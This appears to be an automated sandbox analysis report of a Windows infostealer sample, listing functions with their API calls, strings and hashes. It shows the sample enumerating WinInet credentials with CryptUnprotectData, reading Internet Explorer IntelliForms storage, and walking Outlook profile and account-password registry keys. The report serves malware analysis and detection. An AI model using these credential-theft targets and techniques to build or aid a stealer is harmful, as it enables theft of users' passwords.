Instruction Fuzzy Hash: B65130B1A00219AFEB119BA5DC49FFF77BCEF44340F54406AE505E2251EA789A048B69

Uniqueness

Uniqueness Score: -1.00%

Function 0043D383, Relevance: 18.0, APIs: 8, Strings: 2, Instructions: 469COMMON

Download Yara Rule

Strings

UT, xrefs: 0043D65E
/, xrefs: 0043D41A

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 1aa1086ad3c92fdf3d080439b10b50f7fb822eb1b311bcf55d99b397814083ff
Instruction ID: 49716acb337daf171483a3b2c7896d07ccb7b5296ecd3045db34af1224c2eb52
Opcode Fuzzy Hash: 1aa1086ad3c92fdf3d080439b10b50f7fb822eb1b311bcf55d99b397814083ff
Instruction Fuzzy Hash: 7E029071A083819FD714DF69E4807ABB7E4BF98308F14282FE59587351D738E858CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00429267, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 97stringencryptionCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0042928D
lstrlenW.KERNEL32(00000002), ref: 0042929E
CredEnumerateW.ADVAPI32(Microsoft_WinInet_*,00000000,?,?), ref: 004292C7
CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 0042930D
LocalFree.KERNEL32(?), ref: 00429337
CredFree.ADVAPI32(?), ref: 00429350

Strings

abe2869f-9b47-4cd9-a358-c22904dba7f7, xrefs: 0042927B
Microsoft_WinInet_*, xrefs: 004292C2
J, xrefs: 004292A7

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CredFreelstrlen$CryptDataEnumerateLocalUnprotect
String ID: J$Microsoft_WinInet_*$abe2869f-9b47-4cd9-a358-c22904dba7f7
API String ID: 186292201-3120203912
Opcode ID: 49e922a8a8c9f5fd0a01eb59f1c00cac0250dbf618e576e82cc1262453d08bf1
Instruction ID: c1eb1c5c726858430435db68c65b4014bef873afb7db85ef3fa628b0554c0577
Opcode Fuzzy Hash: 49e922a8a8c9f5fd0a01eb59f1c00cac0250dbf618e576e82cc1262453d08bf1
Instruction Fuzzy Hash: 03312871E00218EBCB20CF95D8849EFBBB8FF88700F54416AE811E3241E7759A05CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00434042, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 201stringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004340FD
lstrlenW.KERNEL32(00000010), ref: 00434107
lstrlenA.KERNEL32(?), ref: 00434144
lstrlenA.KERNEL32(?), ref: 0043417B
lstrlenA.KERNEL32(?), ref: 004341BF

Part of subcall function 00434B2C: lstrlenA.KERNEL32(?,?,?,?,?,?,?,00428D4C,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 00434B51
Part of subcall function 00434B2C: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,?,?,00428D4C,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 00434B78

lstrlenW.KERNEL32(00000000), ref: 00434205

Part of subcall function 00434A6F: lstrlenA.KERNEL32(?,?,76D269A0,?,?), ref: 00434AA0
Part of subcall function 00434A6F: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,76D269A0,?,?), ref: 00434ABF
Part of subcall function 00434A6F: lstrcpyA.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,76D269A0,?,?), ref: 00434AE2
Part of subcall function 00434A6F: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,76D269A0), ref: 00434B0E

lstrlenA.KERNEL32(00007A52), ref: 0043423F

Strings

Rz, xrefs: 00434246
Rz, xrefs: 00434219

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$ByteCharMultiWidelstrcpy$wsprintf
String ID: Rz$Rz
API String ID: 130686893-2271896198
Opcode ID: aa6934d7c40bcdb1bcfd9b39c1f1d2c8fa493484ab28b5a0140cca9475fc338f
Instruction ID: b6e1d3bd49627384b82861552a03f690a75920c8a84af05146c7f0a023a879cc
Opcode Fuzzy Hash: aa6934d7c40bcdb1bcfd9b39c1f1d2c8fa493484ab28b5a0140cca9475fc338f
Instruction Fuzzy Hash: 888139308082C89ADF05DFB8D854AEEFFF1AF5D300F14909EF4856B252D6385685CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0042935B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0046CB80,00000000,00000015,0046CBA0,?), ref: 0042937B
StrStrIW.SHLWAPI(?,0047B394), ref: 004293CC
CoTaskMemFree.OLE32(?), ref: 004293EA
CoTaskMemFree.OLE32(?), ref: 004293F8

Strings

(, xrefs: 004293B0

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeTask$CreateInstance
String ID: (
API String ID: 2903366249-3887548279
Opcode ID: 05f16facd49cbd63af8a881eac7695656e0cf03d1864bde22cd3b16ba69d17f7
Instruction ID: 0dfa651c25570c3f79db868fe714356143b9dd05ad3fa1a8b77520be54487223
Opcode Fuzzy Hash: 05f16facd49cbd63af8a881eac7695656e0cf03d1864bde22cd3b16ba69d17f7
Instruction Fuzzy Hash: CE213970A00219EFDB04DFA5E884EAEB7B9FF48704F50806EE805E7250DB749D41CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0043E07C, Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(000000FF,?,00413D61,00000000,7FFFFFFF,?,00000000,00413A66,?,?,?,00412BD2,00413A66,00000000,00413A66,?), ref: 0043E088
FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,00413D61,00000000,7FFFFFFF,?,00000000,00413A66), ref: 0043E0B8
GetLastError.KERNEL32(?,?,?,?,00413D61,00000000,7FFFFFFF,?,00000000,00413A66,?,?,?,00412BD2,00413A66,00000000), ref: 0043E0C5
FindFirstFileExW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,?,?,?,?,00413D61,00000000,7FFFFFFF,?,00000000,00413A66), ref: 0043E0DF
GetLastError.KERNEL32(?,?,?,?,00413D61,00000000,7FFFFFFF,?,00000000,00413A66,?,?,?,00412BD2,00413A66,00000000), ref: 0043E0EC

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Find$ErrorFileFirstLast$Close
String ID:
API String ID: 569926201-0
Opcode ID: d5b34cdb4c872458f31f00cada39a68b4543b78154f39b56eb6973ad7fd03d4a
Instruction ID: 25badd273795c3e3d056de086acac74af5acf185015a6318ab1631a9ca9d4e3c
Opcode Fuzzy Hash: d5b34cdb4c872458f31f00cada39a68b4543b78154f39b56eb6973ad7fd03d4a
Instruction Fuzzy Hash: 48018031001269BBCB341FB6AC48C6B3F79EB89761B10452AFA64811E0DAB18861DA69

Uniqueness

Uniqueness Score: -1.00%

Function 00436478, Relevance: 6.4, APIs: 4, Instructions: 354registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043647D
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0043651D
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?), ref: 0043656B
RegCloseKey.ADVAPI32(?), ref: 00436574

Part of subcall function 00412593: _Deallocate.LIBCONCRT ref: 004125A2

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseDeallocateH_prologOpenQueryValue
String ID:
API String ID: 2130659939-0
Opcode ID: 3bedfbe74a8b5e4c72700e7ef15b70eb6e3b4fb38d780444960f334bfe75acfa
Instruction ID: 117110e85434c23fffd41b93938fbadf77b694ad2154d8e334ba6e56de8ac586
Opcode Fuzzy Hash: 3bedfbe74a8b5e4c72700e7ef15b70eb6e3b4fb38d780444960f334bfe75acfa
Instruction Fuzzy Hash: CDD12770D05249AEEF15DFA8C8917EEBBB8EF18304F10916FD456B3282D7780A48CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00420010, Relevance: 4.6, APIs: 3, Instructions: 144encryptionCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00420015
_strlen.LIBCMT ref: 00420084
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0042008C

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: BinaryCryptH_prologString_strlen
String ID:
API String ID: 2573900957-0
Opcode ID: 587dc22d7e216a2fcc256d0bd1fd83169b0106aac26ac3be2821c4a3c00f3fb8
Instruction ID: b0281fa12a2e89ed966571ba5558e5defbbb2b459b9d8dd209c12800461c1f68
Opcode Fuzzy Hash: 587dc22d7e216a2fcc256d0bd1fd83169b0106aac26ac3be2821c4a3c00f3fb8
Instruction Fuzzy Hash: 0B5106B4E00259AFDF15CFA9AC905FEFBB9EF05344F40006EE405A7242DB388A15CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004362A8, Relevance: 4.6, APIs: 3, Instructions: 102timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004362AD
GetTimeZoneInformation.KERNEL32(?), ref: 004362CA

Part of subcall function 0041223F: __EH_prolog.LIBCMT ref: 00412244

Part of subcall function 00412950: __EH_prolog.LIBCMT ref: 00412955
Part of subcall function 00412950: std::locale::_Init.LIBCPMT ref: 00412973

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0043641C

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog$InformationInitIos_base_dtorTimeZonestd::ios_base::_std::locale::_
String ID:
API String ID: 3259846166-0
Opcode ID: e462e7814ee4a944cee380b895e7db5e842d9cb7052a6053709a38d4abe79d1a
Instruction ID: a90b8c0b26654543329729ff7cd043f31d6dea600e7062c27a74e404112ec257
Opcode Fuzzy Hash: e462e7814ee4a944cee380b895e7db5e842d9cb7052a6053709a38d4abe79d1a
Instruction Fuzzy Hash: 62419AB0D003589BDB11DFA9C9857EEBBB5AF48304F1081AED808B7241EB781A89CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0043439D, Relevance: 24.1, APIs: 3, Strings: 13, Instructions: 102stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00433A05: LoadLibraryA.KERNEL32(?), ref: 00433A44
Part of subcall function 00433A05: GetProcAddress.KERNEL32(00000000,?), ref: 00433A7F
Part of subcall function 00433A05: FreeLibrary.KERNEL32(00000000), ref: 00433AB3

Part of subcall function 00433E5F: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00433E84
Part of subcall function 00433E5F: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00433F15
Part of subcall function 00433E5F: RegCloseKey.ADVAPI32(?), ref: 00433F22

Part of subcall function 00433F2C: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00433F53
Part of subcall function 00433F2C: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00433F7E
Part of subcall function 00433F2C: lstrlenW.KERNEL32(?), ref: 00433F95
Part of subcall function 00433F2C: lstrlenW.KERNEL32(?), ref: 00433FA2
Part of subcall function 00433F2C: lstrcpyW.KERNEL32 ref: 00433FC3
Part of subcall function 00433F2C: lstrcatW.KERNEL32(00000000,0047BC74), ref: 00433FCF
Part of subcall function 00433F2C: lstrcatW.KERNEL32(00000000,?), ref: 00433FDD
Part of subcall function 00433F2C: lstrcatW.KERNEL32(00000000,?), ref: 00433FE9
Part of subcall function 00433F2C: RegEnumKeyExW.ADVAPI32(?,?,?,000007FF,00000000,00000000,00000000,00000000), ref: 00434023
Part of subcall function 00433F2C: RegCloseKey.ADVAPI32(?), ref: 00434038

Part of subcall function 0043497C: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,?,00000000), ref: 004349C4
Part of subcall function 0043497C: RegQueryValueExW.ADVAPI32(00000100,?,00000000,?,00000000,00000000,?,00000000), ref: 004349E3
Part of subcall function 0043497C: RegQueryValueExW.ADVAPI32(00000100,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00434A1E
Part of subcall function 0043497C: RegCloseKey.ADVAPI32(00000100,?,00000000), ref: 00434A3F

lstrlenW.KERNEL32(00000000), ref: 004343FF
lstrcpyW.KERNEL32 ref: 00434417
lstrcpyW.KERNEL32 ref: 00434423

Part of subcall function 00433E5F: lstrlenW.KERNEL32(?), ref: 00433EAA
Part of subcall function 00433E5F: lstrcpyW.KERNEL32 ref: 00433EC7
Part of subcall function 00433E5F: lstrcatW.KERNEL32(00000000,0047BC74), ref: 00433ED3
Part of subcall function 00433E5F: lstrcatW.KERNEL32(00000000,?), ref: 00433EE1

Part of subcall function 00444AF5: _free.LIBCMT ref: 00444B08

Strings

Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook, xrefs: 0043447D
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook, xrefs: 00434499
Outlook, xrefs: 004343E0
Identities, xrefs: 004343D1
Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook, xrefs: 004344B5
\Accounts, xrefs: 0043441D
Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook, xrefs: 004344C9
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook, xrefs: 00434461
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings, xrefs: 00434456
Software\Microsoft\Internet Account Manager, xrefs: 004343E5
Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook, xrefs: 0043446F
Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook, xrefs: 0043448B
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook, xrefs: 004344A7

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$CloseEnumOpen$LibraryQueryValue$AddressFreeLoadProc_free
String ID: Identities$Outlook$Software\Microsoft\Internet Account Manager$Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook$\Accounts
API String ID: 527226083-2708568971
Opcode ID: e711845317387e7cb6993d4e7f10fb8d1dcba794309c7f198175b8d964a03501
Instruction ID: 98580410122f46bc0d902c87152a135ecd5088a2cad56bbfd0f41e61827a5b79
Opcode Fuzzy Hash: e711845317387e7cb6993d4e7f10fb8d1dcba794309c7f198175b8d964a03501
Instruction Fuzzy Hash: F9315A71944208FEE704FBA18CC3EEE77B8DA58748BA0405EF00562182AFB95F058A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00451116, Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00451185
_free.LIBCMT ref: 0045119B
_free.LIBCMT ref: 004511AE
_free.LIBCMT ref: 004511C3
_free.LIBCMT ref: 004511D8
GetCPInfo.KERNEL32(?,?), ref: 00451222

Part of subcall function 0045C869: _free.LIBCMT ref: 0045C8D4

_free.LIBCMT ref: 0045148D
_free.LIBCMT ref: 004514A0
_free.LIBCMT ref: 004514AE
_free.LIBCMT ref: 004514B9
_free.LIBCMT ref: 004514FB
_free.LIBCMT ref: 00451503
_free.LIBCMT ref: 00451509
_free.LIBCMT ref: 00451511
_free.LIBCMT ref: 0045151F

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: a906e3f2e1caee7ebf1e184ebd839664dbd1b7387856ddf3495886aec23bba0b
Instruction ID: 65c9b88ccd6b589af907b98cbacbdb8886646cd34a67ab890915773bc6e8b82c
Opcode Fuzzy Hash: a906e3f2e1caee7ebf1e184ebd839664dbd1b7387856ddf3495886aec23bba0b
Instruction Fuzzy Hash: 37D1BE719002059FDB11DFB9C881BEEBBF4BF09305F14416EE895AB392D778A849CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00434295, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00433962: lstrlenW.KERNEL32(?,?,004342FF), ref: 00433986
Part of subcall function 00433962: lstrcpyW.KERNEL32 ref: 0043399D
Part of subcall function 00433962: CoTaskMemFree.OLE32(?,?,004342FF), ref: 004339A6

lstrcmpiW.KERNEL32(00000000,identification,00000000), ref: 00434317
lstrcmpiW.KERNEL32(?,identitymgr), ref: 00434325
lstrcmpiW.KERNEL32(00000000,inetcomm server passwords), ref: 00434345
lstrcmpiW.KERNEL32(00000000,outlook account manager passwords), ref: 00434351
lstrcmpiW.KERNEL32(00000000,identities), ref: 0043435D
CoTaskMemFree.OLE32(?), ref: 00434393

Strings

identitymgr, xrefs: 0043431D
identification, xrefs: 00434311
outlook account manager passwords, xrefs: 0043434B
inetcomm server passwords, xrefs: 0043433F
identities, xrefs: 00434357

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcmpi$FreeTask$lstrcpylstrlen
String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
API String ID: 1606502731-4287852900
Opcode ID: 11251dbf3535e1d5886ed7d6d37592204cfd66824728e01002028863a5018a93
Instruction ID: 0ac2071c9c32447876bce63c5d225f7963a447b9772acc924ab0411aa981be65
Opcode Fuzzy Hash: 11251dbf3535e1d5886ed7d6d37592204cfd66824728e01002028863a5018a93
Instruction Fuzzy Hash: 83314F71A0021AEBDF119F95CD85AEF7B79EF88750F10401AFC04A3250DB78EA109AA9

Uniqueness

Uniqueness Score: -1.00%

Function 0046328E, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

Part of subcall function 00462F47: CreateFileW.KERNEL32(00000000,?,?,73F,?,?,00000000,?,00463337,00000000,0000000C), ref: 00462F64

GetLastError.KERNEL32 ref: 004633A2
__dosmaperr.LIBCMT ref: 004633A9
GetFileType.KERNEL32(00000000), ref: 004633B5
GetLastError.KERNEL32 ref: 004633BF
__dosmaperr.LIBCMT ref: 004633C8
CloseHandle.KERNEL32(00000000), ref: 004633E8
CloseHandle.KERNEL32(004599DF), ref: 00463535
GetLastError.KERNEL32 ref: 00463567
__dosmaperr.LIBCMT ref: 0046356E

Strings

H, xrefs: 004634F3

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 5caff39a2cc95cf9a18de0f05501b01dab66b73ae01dd4a4b628eba1aa80755f
Instruction ID: a7c3702b8c0ddc43d702d7fba3614bcfb997aecdb84026d2b3f4ba1d76c36a59
Opcode Fuzzy Hash: 5caff39a2cc95cf9a18de0f05501b01dab66b73ae01dd4a4b628eba1aa80755f
Instruction Fuzzy Hash: 4EA10732A001849FDF19DF68DC517AE7BA1AF06325F14015EF811EB391EA788D16C75B

Uniqueness

Uniqueness Score: -1.00%

Function 004602D2, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 200COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00460340
_free.LIBCMT ref: 0046034C
_free.LIBCMT ref: 00460475
_free.LIBCMT ref: 00460480

Strings

@aH, xrefs: 004602FD

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID: @aH
API String ID: 269201875-2335885206
Opcode ID: eec4aed6820c94c9c2f30e9a7c7e964b27afbd12a85dcd4db50e96e35c054dd1
Instruction ID: a4202ed44d2e3d64ef39492850553bb74fadb2201107e31c895516fb938d6441
Opcode Fuzzy Hash: eec4aed6820c94c9c2f30e9a7c7e964b27afbd12a85dcd4db50e96e35c054dd1
Instruction Fuzzy Hash: 8661C172904704AFDB20DF75C881BABB7E8AF44711F10456FE945AB282FB389C45CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0042A46A, Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 280COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042A46F

Part of subcall function 0040AB11: __EH_prolog.LIBCMT ref: 0040AB16

Part of subcall function 004123B5: _Deallocate.LIBCONCRT ref: 004123CA

Part of subcall function 00412593: _Deallocate.LIBCONCRT ref: 004125A2

Strings

"\, xrefs: 0042A66F
?;#>, xrefs: 0042A6AA
O) 7".&#a;*"?, xrefs: 0042A556
JPV, xrefs: 0042A6E7
M+"5 ,$!c9( =, xrefs: 0042A5CC
D^E_, xrefs: 0042A5FA
(vl, xrefs: 0042A6B3
+jHH, xrefs: 0042A5F3

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID: "\$(vl$+jHH$?;#>$D^E_$JPV$M+"5 ,$!c9( =$O) 7".&#a;*"?
API String ID: 3708980276-2040310613
Opcode ID: 6e938bb4aa17a38e44f43fd6064f5d44505206ea024fef772975cbff3bb6c62a
Instruction ID: a24ac063098ad5ddf8444769f80761f5302c2995f2add12281233b3d092cb00b
Opcode Fuzzy Hash: 6e938bb4aa17a38e44f43fd6064f5d44505206ea024fef772975cbff3bb6c62a
Instruction Fuzzy Hash: E7C1D330E04258DBCF14EFA5D9917EDBBB1AF18308F5440AED44A77242EF781A89CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00456153, Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00456169

Part of subcall function 00457085: HeapFree.KERNEL32(00000000,00000000,?,0046050B,?,00000000,?,00000002,?,004607AE,?,00000007,?,?,00460BAF,?), ref: 0045709B
Part of subcall function 00457085: GetLastError.KERNEL32(?,?,0046050B,?,00000000,?,00000002,?,004607AE,?,00000007,?,?,00460BAF,?,?), ref: 004570AD

_free.LIBCMT ref: 00456175
_free.LIBCMT ref: 00456180
_free.LIBCMT ref: 0045618B
_free.LIBCMT ref: 00456196
_free.LIBCMT ref: 004561A1
_free.LIBCMT ref: 004561AC
_free.LIBCMT ref: 004561B7
_free.LIBCMT ref: 004561C2
_free.LIBCMT ref: 004561D0

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 940a167c2d47dbf190a29dd6dd91c459525b6bf0a8148b486cde6813011b8862
Instruction ID: e184478f1a63851a451d7585c29fb1c37829856d73284c17b060c0b80500ccca
Opcode Fuzzy Hash: 940a167c2d47dbf190a29dd6dd91c459525b6bf0a8148b486cde6813011b8862
Instruction Fuzzy Hash: 7321ED76904108BFCB01EFA6D851CDE7BF5BF08745F00416AF9059B162DB39DA48CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0043F068, Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0043F0B1
__alloca_probe_16.LIBCMT ref: 0043F0DD
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0043F11C
LCMapStringEx.KERNEL32 ref: 0043F139
LCMapStringEx.KERNEL32 ref: 0043F178
__alloca_probe_16.LIBCMT ref: 0043F195
LCMapStringEx.KERNEL32 ref: 0043F1D7
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0043F1FA

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 0c94a14ee63945afa42758941a450f97c49a74ed57e14659e9719d7345e5affd
Instruction ID: 000acb6c4f543f435341489ff8fb926010f535ef75589703cf0cf600600befcb
Opcode Fuzzy Hash: 0c94a14ee63945afa42758941a450f97c49a74ed57e14659e9719d7345e5affd
Instruction Fuzzy Hash: 6A51A072D0021AEBEF205F94DC44FAF3BA9EB48754F15417AFD1496260E7798C188B98

Uniqueness

Uniqueness Score: -1.00%

Function 0043E1E9, Relevance: 10.7, APIs: 7, Instructions: 190COMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32(?,00000000,?,?,?), ref: 0043E28B
GetLastError.KERNEL32(?,?), ref: 0043E295
___std_fs_open_handle@16.LIBCPMT ref: 0043E2F5

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AttributesErrorFileLast___std_fs_open_handle@16
String ID:
API String ID: 617199260-0
Opcode ID: 6356832f6f060a23d92c97b635dce7b4f2ec08ad900a14734218e92f9d863122
Instruction ID: e5f5f453d7be788bba3b7c8c220b8a4ae0bb97a5009cbab3322bf97598242091
Opcode Fuzzy Hash: 6356832f6f060a23d92c97b635dce7b4f2ec08ad900a14734218e92f9d863122
Instruction Fuzzy Hash: B8617171A017059BDB18CFAAC881BAB77B4BF09310F14526AEC61DB3C1E774E911CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042314E, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 162COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00423153

Part of subcall function 00412593: _Deallocate.LIBCONCRT ref: 004125A2

Strings

; expected , xrefs: 00423337
syntax error , xrefs: 00423170
while parsing , xrefs: 00423199
unexpected , xrefs: 004232D8
; last read: ', xrefs: 0042322E

Memory Dump Source

Source File: 0000001B.00000002.509918737.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.511430795.000000000046C000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID: ; expected $; last read: '$syntax error $unexpected $while parsing
API String ID: 3708980276-4239264347
Opcode ID: dd7a10942e705f05a571642e384c7afc5608c8f44491bbc93fd58f5405cb6afc
Instruction ID: 4f9d85f418ae36473ad192b5fb0b476debd41c5afd8e5a62b0d6d5f50e0727f1
Opcode Fuzzy Hash: dd7a10942e705f05a571642e384c7afc5608c8f44491bbc93fd58f5405cb6afc
Instruction Fuzzy Hash: AA616E70900258EFCF04EFA9C591BEDBBB5AF58314F54406EE105A3282DBB85B98CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0042705D, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON

Download Yara Rule

APIs

